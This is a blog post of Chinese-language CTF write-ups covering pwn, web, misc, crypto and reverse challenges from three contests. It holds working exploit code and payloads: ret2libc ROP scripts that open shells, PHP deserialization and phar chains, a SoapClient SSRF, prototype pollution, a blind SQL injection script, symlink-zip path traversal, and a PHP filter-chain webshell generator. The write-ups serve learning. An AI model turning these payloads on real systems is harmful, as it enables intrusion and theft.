分类: WP

2022 I-S00N CTF Partly Writeup | By SanDieg0

PWN

babyarm

首先就是绕过一个简单的变表base64的加密key

然后就是一个类似ret2libc的利用方式,不过没有直接控制r0的gadget

使用的是arm32中万能的gadget

from pwn import *
#p = process(["qemu-arm","-g", "1212","-L", "/usr/arm-linux-gnueabi/", "./chall"])
#p = process(['qemu-arm','-L','/usr/arm-linux-gnueabi/','./chall'])
p = remote('47.108.29.107',10244)
context.log_level='debug'
context.arch='arm'

elf = ELF('./chall')
libc = ELF('./libc-2.27.so')
#context.terminal = ['gnome-terminal','-x','sh','-c']

s       = lambda data               :p.send(str(data))
sa      = lambda delim,data         :p.sendafter(str(delim), str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda delim,data         :p.sendlineafter(str(delim), str(data))
r       = lambda num                :p.recv(num)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
itr     = lambda                    :p.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))

sla('msg> ','s1mpl3Dec0d4r')
r4 = 0x00010cb0
r3 = 0x00010464
movcall = 0x00010ca0
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
leak('puts',puts_plt)
pl = b'a'*0x2c+p32(r4)+p32(0)+p32(0)+p32(0)+p32(puts_got)+p32(0)+p32(0)+p32(0)+p32(r3)+p32(puts_plt)+p32(movcall)+p32(0)+p32(0)+p32(0)+p32(0)+p32(0)+p32(0)+p32(0)+p32(0x0010B60)
pause()
p.sendlineafter('comment> ',pl)
libcbase = uu64(r(4)) - libc.sym['puts']
system = libcbase + libc.sym['system']
binsh = libcbase + 0x00131bec
leak('libcbase',libcbase)
sla('msg> ','s1mpl3Dec0d4r')

pl = b'a'*0x2c+p32(r4)+p32(0)+p32(0)+p32(0)+p32(binsh)+p32(0)+p32(0)+p32(0)+p32(r3)+p32(system)+p32(movcall)
p.sendlineafter('comment> ',pl)

p.interactive()

image

{: id="20221127195858-c3goidh" updated="20221127195900"}

WEB

babyphp

<?php
//something in flag.php

class A
{

    public $a;
    public $b;

    public function __construct()
    {
        $this->a="0e1137126905";
    }
    public function __wakeup()
    {
        $this->a = "babyhacker";
    }

    public function __invoke()
    {
        if (isset($this->a) && $this->a == md5($this->a)) {
            $this->b->uwant();
        }
    }
}

class B
{
    public $a;
    public $b;
    public $k;

    function __destruct()
    {
        $this->b = $this->k;
        die($this->a);
    }
}

class C
{
    public $a;
    public $c;
    public function __construct(){
        $this->a="phpinfo";
    }
/*
    public function __toString()
    {
        $cc = $this->c;
        return $cc();
    }
    */
    public function uwant()
    {
        if ($this->a == "phpinfo") {
            phpinfo();
        } else {
            call_user_func(array(reset($_SESSION), $this->a));
        }
    }
}

$pop=new B();
$pop->a=new C();
$pop->a->c=new A();
$pop->a->c->b=new C();

echo serialize($pop);

同时在 flag.php中 需要使用ssrf 尝试在call_user_func处 使用soapclient 进行 ssrf

<?php
$target='http://127.0.0.1/flag.php?a=SplFileObject&b=/f1111llllllaagg';
$b = new SoapClient(null,array('location' => $target,
    'user_agent' => "sp4c1ous\r\nCookie:PHPSESSID=flag123\r\n",
    'uri' => "http://127.0.0.1/"));
$a = serialize($b);
echo "|".urlencode($a);

然后结合session反序列化 可以打出

image

ez_js

查看源码 可用 MD5爆破将secret爆破出 为abcdefg

from hashlib import sha256,md5
x = '1946714cfa9deb70cc40bab32872f98a'
n = b'flag'
s = list('abcdefghijklmnopqrstuvwxyz'.strip())
import itertools
for i in itertools.product(s,repeat = 7):
    d = ''.join(i).encode()
    g = d+n
    m=md5(g).hexdigest()

    if m == x:
        print(d)
        break

可得admin的cookie ed63246fb602056fee4a7ec886d0a3c2

将其填入hash 可跳转得到源码

var express = require('express');
var router = express.Router();

const isObject = obj => obj && obj.constructor && obj.constructor === Object;
const merge = (a, b) => {
  for (var attr in b) {
    if (isObject(a[attr]) && isObject(b[attr])) {
      merge(a[attr], b[attr]);
    } else {
      a[attr] = b[attr];
    }
  }
  return a
}
const clone = (a) => {
  return merge({}, a);
}

router.get('/', function(req, res, next) { 
  if(req.flag=="flag"){
    //输出flag;
    res.send('flag?????????????');
    }
    res.render('info');
});

router.post('/', express.json(),function(req, res) {
  var str = req.body.id;
  var obj = JSON.parse(str);
  req.cookies.id=clone(obj);
  res.render('info');
});

module.exports = router;

merge的原型链污染 直接打

id={"aaa":1,"__proto__":{"flag":"flag"}}

image

可得flag

ezupload

先上传一个phpinfo查看细节:

image

发现 disable_functions ​被过滤了很多,尝试绕过。

和mysql里写shell一样,16进制,8进制,Unicode编码都可以,这里选择的是hex编码:

image

<?php echo "\x66\x69\x6c\x65\x5f\x67\x65\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73"("index.php");?>

额虽然没读取到,但是说明命令执行成功了

image

然后就是利用glob://​尝试获取根目录flag位置:

PHP使用DirectoryIterator遍历指定目录下的所有文件-PHP基础-自如初个人博客 (ziruchu.com)

image

 <?php new DirectoryIterator("glob:///fl*");?>

转一个16进制,然后获取这个文件就行

image

file_get_contents("/fl1111111111ag")

MISC

GumpKing

直接CE改分就行

little_thief

流量包提取压缩包文件:

image

在流量记录里可以找到POST提交的流量,里面有jwt,解密:

image

image

得到密码,解压后得到flag.html

打开后里面是在线编辑器生成的,怀疑有隐写,wbStego4.3open.exe打开,不知道密码,尝试无密码获取

image

image

CRYPTO

Cry1

import string
import hashlib
a="JmxeKr3R4zh6CXZc"
encode1="3ed373143ba9844885a3fff7afd3f7eec9982bd9be51c642314855cc015da3da"
str=string.ascii_letters+string.digits
for i1 in str:
    for i2 in str:
        for i3 in str:
            for i4 in str:
                plain=i1+i2+i3+i4+a
                encode=hashlib.sha256(plain.encode()).hexdigest()
                if encode==encode1:
                    print(i1+i2+i3+i4)
#Tg4N

猜了无数次,服了

dcee4f4aead936232e409d7518778ab

Cry2

上来还是常规的加盐爆破,不说了

先用本地,弄清了一下原理

就是用flag2作为key,加密了flag1+imessage+flag2

nc之后随便敲个空格就能拿到flag1+flag2的密文,关键是key

没啥好办法,只能一位一位爆破了

from pwn import *
from Crypto.Util.number import *
import gmpy2
import string
import itertools
from tqdm import tqdm
import hashlib
from tqdm import tqdm
from Crypto.Cipher import AES
table = string.ascii_letters + string.digits
# context(log_level = 'debug')
ip = '120.78.131.38'
port = 10086
r = remote(ip,port)
def proof():
    r.recvuntil(b'SHA256(XXXX')
    a = r.recvline()[:-1].decode()
    tmp = a[a.find(' + ') + 3:a.find(')')]
    aim = a[a.find(':') + 1:]
    for i in itertools.product(table,repeat=4):
        ans = ''.join(i)
        if hashlib.sha256((ans + tmp).encode()).hexdigest() == aim:
            print(ans)
            r.recvuntil(b'Give Me XXXX:\n')
            r.sendline(ans.encode())
            return

proof()
flag2 = ''
for i in tqdm(range(1,16)):
    for t in table:
        tmp = '0' * 8 + '0' * (16 - i) + flag2 + t + '0' * (16 - i)
        # print(payload)
        r.recvuntil(b'You can input anything:\n')
        r.send(tmp.encode())
        r.recvuntil(b"Here is your cipher: b'")
        cipher = r.recvuntil(b"'")[:-1]
        # print(cipher)
        p = [cipher[i : i + 32] for i in range(0,len(cipher),32)]
        if p[1] == p[2]:
            flag2 += t
            print(fleg)
            break
flag2 += '}'
key = flag2.encode()
print(key)
r.interactive()

9d30601ed8af0f7cb9f55212ce3e005

最后一个AES解密解决战斗

table='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
def pad( message):
    if len(message) % 16 != 0:
        return message.ljust((len(message) // 16 + 1) * 16, '0').encode()
    else:
        return message.encode()
def encrypt( key, message):
    aes = AES.new(key, AES.MODE_ECB)
    return aes.encrypt(message)
def decrypt( key, message):
    aes = AES.new(key, AES.MODE_ECB)
    return aes.decrypt(message)
from Crypto.Cipher import AES
from Crypto.Util.number import *
c=0x68e05ae1ed73ec29526b7f4ec7e025cfa162a7f20d8401a05a45c67fd6dbc180
c=long_to_bytes(c)
def decrypt(key, message):
    aes = AES.new(key, AES.MODE_ECB)
    return aes.decrypt(message)
key='IDl8FuWPu01RHZt}'
print(decrypt(key.encode(),c))
#b'D0g3{o7sIDl8FuWPu01RHZt}00000000'

REVERSE

reee

32位,打开题目跟进函数找到加密逻辑,发现没有编译成函数

a1fda9996f396c28e79749b4b2f91e6

编译成函数后,简单分析发现是RC4,密文和key已知,在线网站解密即可

D0g3{This_15_FindWind0w}

5thSpace Partly Writeup | QUALS

MISC

sakana_reveage

看源码:

            #no symlink for it 
            for zip_info in zipfile.ZipFile(zip_file).infolist():
                if zip_info.external_attr >> 16:
                    print("Hacker!!!")
                    return

所以我们可以选择发送输入。如果存在符号链接,则会打印“hacker”并返回,因此我们无法将如下所示的 zip 文件上传到此函数:

ln -s /flag symlink_to_flag.link 
zip --symlink flag.zip symlink_to_flag.link

binascii.Error被抛出时,我们并没有返回,而是继续运行该函数。这导致尝试提取/tmp/sakanas.zip

def sakana_upload():
    sakana_file_name = input("Name for your sakana:")

    encoded_sakana_content = input("Base64-encoded sakana:")
    try:
        decode_content = base64.b64decode(encoded_sakana_content)
    except binascii.Error:
        print("Error base64!")
        return

    if decode_content == b"":
        print("Empty file!")
        return

    if not decode_content.startswith(b"sakana"):
        print("Only sakana files are allowed!")
        return

    with open(os.path.join(SAKANA_PATH, sakana_file_name), "wb") as sakana_file_handle:
        sakana_file_handle.write(decode_content)

在这里我们看到文件名容易受到目录遍历攻击。这意味着我们也可以写入../../../tmp/sakanas.zip. 所以也许我们可以通过将文件上传到这个路径来读取标志,然后binascii.ErrorUpload sakanas of Zip函数中触发 a 时将其解压缩。

此外文件内容base64解码开头必须是sakana,所以创建一个内容为sakana的sakana文件

cat flag.zip >> sakana 
base64 sakana
#c2FrYW5hUEsDBAoAAAAAAK16M1VOewN1BQAAAAUAAAAUABwAc3ltbGlua190b19mbGFnLmxpbmtVVAkAA3UYKGN1GChjdXgLAAEE6AMAAAToAwAAL2ZsYWdQSwECHgMKAAAAAACtejNVTnsDdQUAAAAFAAAAFAAYAAAAAAAAAAAA/6EAAAAAc3ltbGlua190b19mbGFnLmxpbmtVVAUAA3UYKGN1eAsAAQToAwAABOgDAABQSwUGAAAAAAEAAQBaAAAAUwAAAAAA

然后进行上传,再触发解压:

┌──(kali㉿kali)-[~]
└─$  nc 47.93.30.67 57427

   _____      /\/|        /\/|              _____ _    ___       ______ 
  / ____|    |/\/ |      |/\/              / ____| |  / _ \     |  ____|
 | (___   __ _  | | ____ _   _ __   __ _  | (___ | |_| | | |_ __| |__   
  \___ \ / _` | | |/ / _` | | '_ \ / _` |  \___ \| __| | | | '__|  __|  
  ____) | (_| | |   < (_| | | | | | (_| |  ____) | |_| |_| | |  | |____ 
 |_____/ \__,_| |_|\_\__,_| |_| |_|\__,_| |_____/ \__|\___/|_|  |______|

1. Upload an sakana
2. Download an sakana
3. Delete an sakana
4. Upload sakanas of Zip
5. Exit

Input your choice
>> 1
Name for your sakana:../../../tmp/sakanas.zip.zip
Base64-encoded sakana:c2FrYW5hUEsDBAoAAAAAAK16M1VOewN1BQAAAAUAAAAUABwAc3ltbGlua190b19mbGFnLmxpbmtVVAkAA3UYKGN1GChjdXgLAAEE6AMAAAToAwAAL2ZsYWdQSwECHgMKAAAAAACtejNVTnsDdQUAAAAFAAAAFAAYAAAAAAAAAAAA/6EAAAAAc3ltbGlua190b19mbGFnLmxpbmtVVAUAA3UYKGN1eAsAAQToAwAABOgDAABQSwUGAAAAAAEAAQBaAAAAUwAAAAAA

1. Upload an sakana
2. Download an sakana
3. Delete an sakana
4. Upload sakanas of Zip
5. Exit

Input your choice
>> 4
Base64-encoded zip of sakanas:a
Error base64!
[/tmp/sakanas.zip]
  End-of-central-directory signature not found.  Either this file is not
  a zipfile, or it constitutes one disk of a multi-part archive.  In the
  latter case the central directory and zipfile comment will be found on
  the last disk(s) of this archive.
warning [/tmp/sakanas.zip.zip]:  6 extra bytes at beginning or within zipfile
  (attempting to process anyway)
Zip successfully uploaded and extracted

1. Upload an sakana
2. Download an sakana
3. Delete an sakana
4. Upload sakanas of Zip
5. Exit

Input your choice
>> 2
0 -> symlink_to_flag.link

Select num which sakana to download
>> 0
Here is your sakana file(base64ed)
ZmxhZ3s2U0FVdDJ1VzV2blNKTjZ1VHhhMkpNWVdnUUNhSEZIVn0=

1. Upload an sakana
2. Download an sakana
3. Delete an sakana
4. Upload sakanas of Zip
5. Exit

image-20220919180324-caoedru

5_Misc_m@sTeR_0f

这道题进入之后是一个

image

sqlite 查询的页面,经过测试后发现过滤了许多的内容,由于这里放在了 misc,考虑是一些cve,不过也没有找到。

后来想到了利用写文件写入恶意so文件,然后利用

这里首先生成一个恶意的 so 文件

b5a5357b23addfbbb9bb72dee037481

利用sqlite的writefile将恶意so文件写入,这里因为 . 被过滤文件名需要套一个hex,文件内容我们也用 hex 写入即可

image

然后load一下即可执行我们写入的命令,load没过大小写,估计是非预期吧

image

5_简单的Base

666c61677b57656c636f6d655f686572657d

hex解码即可

image

web

5_web_BaliYun

dirsearch扫描后 www.zip 源码泄露 发现是phar反序列化

    public function __wakeup(){
        echo file_get_contents($this->filename);
    }

此处存在任意文件读取漏洞,打眼一看看到 file_exit,phar没跑了,构造 phar 文件

<?php
class upload{
    public $filename = "/flag";
}
$phar = new Phar('phar.phar');
$phar -> stopBuffering();
$phar -> setStub('GIF89a'.'<?php __HALT_COMPILER();?>');
$phar -> addFromString('test.txt','test');
$object = new upload();
$phar -> setMetadata($object);
$phar -> stopBuffering();

web1

5_easylogin

登录界面 发现存在宽字节注入漏洞

web2

尝试进行注入,双写绕过union select,发现数据库里没东西

直接利用union任意修改密码的漏洞 尝试修改密码登录

username=admin%df'uniunionon(selselectect(1),2,0x3936653739323138393635656237326339326135343964643561333330313132)#&password=111111

web22

5_web_Eeeeasy_SQL

http://39.107.76.202:64040/api/ 发现存在目录遍历漏洞,看到 flag.php,直接访问回显

image

尝试登录,发现可以通过注释引号的方式闭合

image

但是闭合后是一个跳转,并不是什么拥有特征的界面,这里过滤了非常多的注入相关的内容,selectsubstrleftmid*-+|,空格 等等,但是大于小于号没有过滤,猜测这里可能还是存在盲注。但是没有发现怎样进行盲注,sleep 等函数也被禁用了,不能延时也没有回显。

后续在测试的时候发现,这里如果能够有返回为false的话就会回显 msg,经过测试后发现,我们可以构造条件语句进行盲注,空格可以用 #%0a 绕过

or(case#%0awhen#%0ausername>0x60#%0athen#%0a1#%0aelse#%0apow(~0,17)#%0aend)#&

image

image

这样的话我们就开可以编写脚本进行盲注,这里要注意加上 allow_redirects=False

import requests

url = "http://39.106.143.69:22993/api/api.php?command=login "

flag = ""
char = ""
for _ in range(100):
 for i in range(30,127):

  data = {
  "username":"1\\",
  "password":"or(case when password>{} then 1 else pow(~0,17) end)#".format("0x"+char+hex(i)[2:])
  }
  #绕过空格
  data['password'] = data['password'].replace(" ","#\n")

  res = requests.post(url=url,data=data,allow_redirects=False)

  if 'success' not in res.text:
   flag+=chr(i-1)
   char+=hex(i-1)[2:]
   print(flag)
   break

这样获取到的 ADMIM@666 和 AAAA@XXXXZZZ 的那个用户名和密码并登录不上去。

这里尝试了一下 hex,因为之前做过类似的, hex 会从后向前进行读取,应该算是个非预期了233

import requests

url = "http://39.106.143.69:22993/api/api.php?command=login "

flag = ""
char = ""
for _ in range(100):
 for i in range(30,127):

  data = {
  "username":"1\\",
#  "password":"or(case when hex(username)>{} then 1 else pow(~0,17) end)#".format("0x"+char+hex(i)[2:])
  "password":"or(case when hex(password)>{} then 1 else pow(~0,17) end)#".format("0x"+char+hex(i)[2:])
  }
  #绕过空格
  data['password'] = data['password'].replace(" ","#\n")

  res = requests.post(url=url,data=data,allow_redirects=False)

  if 'success' not in res.text:
   flag+=chr(i-1)
   char+=hex(i-1)[2:]
   print(flag)
   break

注出来之后解码,登录即可

image

username=Flag_Account&password=G1ve_Y0u_@_K3y_70_937_f14g!!!

登陆后访问 /api/flag.php,一个简单的文件包含 /proc/self/root 即可绕过

5_web_letmeguess_1

弱密码 admin amdin123 登录

发现 ; 被过滤,%0a ,空格被过 ${IFS},文件名被过,通配符

image

简单绕一绕就好了

image

PWN

5_1H3ll0Rop

#encoding = utf-8
import os
import sys
import time
from pwn import *
from ctypes import *
from LibcSearcher import * 
context.os = 'linux'
context.log_level = "debug"
s       = lambda data               :p.send(str(data))
sa      = lambda delim,data         :p.sendafter(str(delim), str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda delim,data         :p.sendlineafter(str(delim), str(data))
r       = lambda num                :p.recv(num)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
itr     = lambda                    :p.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))

context.arch = 'amd64'
p = remote('39.106.138.251',37817)
#p = process('./H3ll0Rop')
libc = ELF('./libc-2.23.so')
elf = ELF('./H3ll0Rop')
rdi = 0x0000000000400753
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main = elf.sym['main']
pl = b'a'*0x68 + p64(rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
#gdb.attach(p)
p.sendlineafter('\n\n',pl)
ru('\n\n')
libcbase = uu64(r(6))-libc.sym['puts']
leak('libcbase',libcbase)
system = libcbase + libc.sym['system']
binsh = libcbase +0x000000000018ce57
pl = b'a'*0x68 + p64(rdi) + p64(binsh) + p64(system)
p.sendlineafter('\n\n',pl)
itr()

ret2libc

RE

5_re2

ghidra打开,是一道迷宫题,迷宫为三个15*15的正方形,将三个迷宫路径连接得到flag 。在ida里导出地图数据

写脚本把map还原出来

#include <bits/stdc++.h>
int a1[15][15] ;
int a2[15][15] ;
int a3[15][15] ;
int a[700] = {
        1, 1, 0, 0, 0, 0, 0, 0, 
    0, 0, 0, 0, 0, 0, 0, 1, 
    1, 0, 3, 1, 1, 1, 1, 1, 
    0, 0, 0, 0, 0, 0, 1, 1, 
    0, 1, 1, 0, 0, 0, 1, 0, 
    0, 0, 0, 0, 0, 1, 1, 0, 
    0, 0, 0, 0, 0, 1, 1, 0, 
    0, 0, 0, 0, 1, 1, 0, 1, 
    1, 0, 0, 0, 0, 1, 1, 1, 
    1, 0, 0, 1, 1, 0, 1, 1, 
    0, 0, 0, 0, 0, 0, 0, 1, 
    0, 0, 1, 1, 0, 1, 1, 0, 
    0, 0, 0, 0, 0, 0, 1, 0, 
    0, 1, 1, 0, 1, 1, 0, 0, 
    0, 0, 0, 1, 1, 1, 1, 0, 
    1, 1, 0, 1, 1, 0, 0, 0, 
    0, 0, 1, 0, 0, 1, 0, 1, 
    1, 0, 1, 1, 0, 0, 0, 0, 
    0, 1, 0, 0, 0, 0, 1, 1, 
    0, 1, 1, 1, 1, 1, 1, 0, 
    1, 0, 1, 1, 0, 1, 1, 0, 
    1, 1, 1, 1, 1, 1, 1, 1, 
    1, 1, 1, 0, 1, 1, 0, 0, 
    0, 0, 0, 0, 0, 0, 0, 0, 
    0, 4, 0, 1, 1, 1, 1, 1, 
    1, 1, 1, 1, 1, 1, 1, 1, 
    1, 1, 1, 1, 1, 1, 1, 1, 
    1, 1, 1, 1, 1, 1, 1, 1, 
    1, 1, 1, 1, 1, 1, 0, 0, 
    0, 0, 0, 0, 0, 0, 0, 0, 
    1, 1, 1, 1, 1, 0, 3, 1, 
    1, 1, 0, 0, 0, 0, 0, 1, 
    1, 1, 1, 1, 0, 0, 0, 0, 
    1, 0, 0, 0, 0, 0, 1, 1, 
    1, 1, 1, 0, 0, 0, 0, 1, 
    0, 0, 0, 0, 0, 1, 1, 1, 
    1, 1, 0, 0, 0, 0, 1, 1, 
    1, 1, 0, 0, 1, 1, 1, 1, 
    1, 0, 0, 0, 0, 0, 0, 0, 
    1, 0, 0, 1, 1, 1, 1, 1, 
    0, 0, 0, 0, 0, 0, 0, 1, 
    0, 0, 1, 1, 1, 1, 1, 0, 
    0, 0, 0, 0, 0, 0, 1, 1, 
    0, 1, 1, 1, 1, 1, 0, 0, 
    0, 0, 0, 0, 0, 0, 1, 0, 
    1, 1, 1, 1, 1, 0, 0, 0, 
    0, 0, 0, 0, 0, 4, 0, 1, 
    1, 1, 1, 1, 1, 1, 1, 1, 
    1, 1, 1, 1, 1, 1, 1, 1, 
    1, 1, 1, 1, 1, 1, 1, 1, 
    1, 1, 1, 1, 1, 1, 1, 1, 
    1, 1, 1, 1, 1, 1, 1, 1, 
    1, 1, 1, 1, 1, 1, 1, 1, 
    1, 1, 1, 1, 1, 1, 1, 1, 
    1, 1, 1, 1, 1, 1, 1, 1, 
    1, 1, 1, 1, 1, 1, 1, 1, 
    1, 1, 0, 0, 0, 0, 0, 0, 
    0, 0, 0, 0, 0, 0, 0, 0, 
    0, 0, 3, 1, 1, 0, 0, 0, 
    0, 0, 0, 0, 0, 0, 0, 0, 
    0, 0, 0, 1, 0, 1, 1, 1, 
    0, 0, 0, 0, 0, 0, 0, 0, 
    0, 0, 1, 1, 1, 0, 1, 0, 
    0, 0, 0, 0, 0, 0, 0, 0, 
    0, 0, 1, 0, 0, 1, 0, 0, 
    0, 0, 0, 0, 0, 0, 1, 1, 
    0, 1, 0, 0, 1, 0, 0, 0, 
    0, 0, 0, 0, 0, 0, 1, 1, 
    1, 0, 0, 1, 0, 0, 0, 0, 
    0, 0, 0, 0, 0, 0, 0, 0, 
    0, 0, 1, 0, 0, 0, 0, 0, 
    0, 0, 0, 0, 0, 0, 0, 0, 
    0, 1, 1, 1, 1, 0, 0, 0, 
    0, 0, 0, 0, 0, 0, 0, 0, 
    0, 0, 0, 1, 0, 0, 0, 0, 
    0, 0, 0, 0, 0, 0, 0, 0, 
    0, 0, 1, 0, 0, 0, 0, 0, 
    0, 0, 0, 0, 0, 0, 0, 0, 
    0, 1, 0, 0, 0, 0, 0, 0, 
    0, 0, 0, 0, 0, 0, 0, 0, 
    1, 1, 1, 1, 0, 0, 0, 0, 
    0, 0, 0, 0, 0, 0, 0, 0, 
    0, 0, 1, 0, 0, 0, 0, 0, 
    0, 0, 0, 0, 0, 0, 0, 0, 
    0, 4, 0, 0
};
void makee1(){
    for(int i = 0;i<=14;i++){
        for(int j = 0;j<=14;j++){
            printf("%d ",a1[i][j]);
        }
        printf("\n");
    }
}
void makee2(){
    for(int i = 0;i<=14;i++){
        for(int j = 0;j<=14;j++){
            printf("%d ",a2[i][j]);
        }
        printf("\n");
    }
}
void makee3(){
    for(int i = 0;i<=14;i++){
        for(int j = 0;j<=14;j++){
            printf("%d ",a3[i][j]);
        }
        printf("\n");
    }
}
int main(){
​
    for(int i = 0;i<=14;i++){
        for(int j = 0;j<=14;j++){
            a1[i][j] = a[i * 15 + j];
        }
    }
    for(int i = 0;i<=14;i++){
        for(int j = 0;j<=14;j++){
            a2[i][j] = a[0xe1 + i * 15 + j];
        }
    }
    for(int i = 0;i<=14;i++){
        for(int j = 0;j<=14;j++){
            a3[i][j] = a[0xe1 + 0xe1 + i * 15 + j];
        }
    }
    makee1();
    printf("\n\n");
    makee2();
    printf("\n\n"); 
    makee3();
    return 0;
}

走迷宫得到路径:

image

dddddssdsdddsssaassssdddsdddsssdddsssdssddssddwddssssssdddssssdddss,md5 加密包裹得到flag

2022 YangchengCup | Partly Writeup

WEB

Web1:rce_me

(231条消息) [PHP]无需可控文件的LFI-RCE学习_bfengj的博客-CSDN博客

https://tttang.com/archive/1395/

之前在SESSION文件包含的时候就遇到过往SESSION里面写base64,前面凑齐4的整数倍的字符,然后接下来就是一句话的base64编码,再利用php://filter/convert.base64-decode/resource=/tmp/sess_xxx就可以直接rce,因为里面的base64解码后就可以得到完整的一句话。

再联想到,base64解码的时候会忽略除了base64中那64个字符的其他字符,只处理那64个字符,于是国外的那个师傅就开始尝试能不能通过iconv中不同字符集的转换来成功的得到base64中的字符,最后再来一层base64-decode即可rce。

比如convert.iconv.UTF8.CSISO2022KR,每次这样都会在字符串的首部产生\x1b$)C,可以发现这4个字符中只有字符C属于Base64中,再进行一次base64-decode再base64-encode之后,就只剩下字符C了:

include "php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode/resource=data://,aaaaa"

同理,也可以得到更多的字符:

<?=`$_GET[0]`;;?>
PD89YCRfR0VUWzBdYDs7Pz4=
<?php
$base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4";
$conversions = array(
    'R' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2',
    'B' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2',
    'C' => 'convert.iconv.UTF8.CSISO2022KR',
    '8' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
    '9' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB',
    'f' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213',
    's' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61',
    'z' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS',
    'U' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932',
    'P' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213',
    'V' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5',
    '0' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2',
    'Y' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2',
    'W' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2',
    'd' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2',
    'D' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2',
    '7' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2',
    '4' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2'
);

$filters = "convert.base64-encode|";
$filters .= "convert.iconv.UTF8.UTF7|";

foreach (str_split(strrev($base64_payload)) as $c) {
    $filters .= $conversions[$c] . "|";
    $filters .= "convert.base64-decode|";
    $filters .= "convert.base64-encode|";
    $filters .= "convert.iconv.UTF8.UTF7|";
}
$filters .= "convert.base64-decode";

$final_payload = "php://filter/{$filters}/resource=data://,aaaaaaaaaaaaaaaaaaaa";
var_dump($final_payload);

$base64_payload反转则是因为是从右边开始产生字符,然后在最左边通过convert.iconv.UTF8.CSISO2022KR来生成\x1b$)C然后进行利用,还不能影响后面已经产生的字符。

至于convert.iconv.UTF8.UTF7单纯的防止=的干扰。

源码:

<?php
(empty($_GET["file"])) ? highlight_file(__FILE__) : $file=$_GET["file"];
function fliter($var): bool{
     $blacklist = ["<","?","$","[","]",";","eval",">","@","_","create","install","pear"];
         foreach($blacklist as $blackword){
           if(stristr($var, $blackword)) return False;
    }
    return True;
}  
if(fliter($_SERVER["QUERY_STRING"]))
{
include $file;
}
else
{
die("Noooo0");
}

有黑名单过滤,urlencode一下即可绕过

php://filter/convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC%5fP271.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.ic